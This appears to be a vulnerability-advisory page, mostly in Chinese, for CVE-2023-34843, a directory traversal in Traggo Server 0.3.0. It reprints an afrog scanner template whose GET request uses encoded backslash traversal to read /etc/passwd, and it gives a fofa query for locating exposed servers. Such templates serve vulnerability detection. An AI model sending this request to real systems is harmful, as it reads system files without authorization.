CVE-2023-34843: Traggo directory traversal

日期: 2025-09-01 | 影响软件: Traggo | POC: 已公开

漏洞描述

CVE-2023-34843 Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET reques fofa: "traggo"

PoC代码[已公开]

id: CVE-2023-34843

info:
  name: Traggo directory traversal
  author: laohuan12138
  severity: high
  verified: true
  description: |
    CVE-2023-34843 Traggo Server 0.3.0 is vulnerable to directory traversal via a crafted GET reques
    fofa: "traggo"
  reference:
    - https://twitter.com/CVEnew/status/1674221239550836736
    - https://github.com/rootd4ddy/CVE-2023-34843

  tags: cve,cve2023,lfi
  created: 2023/07/01

rules:
  r0:
    request:
      method: GET
      path: /static/..%5c..%5c..%5c..%5cetc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-34843.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2023-34843: Traggo Server - Local File Inclusion POC

TraggoServer /static 文件读取漏洞（CVE-2023-34843） 无POC

traggo 任意文件读取(CVE-2023-34843) 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

TraggoServer /static 文件读取漏洞（CVE-2023-34843）无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC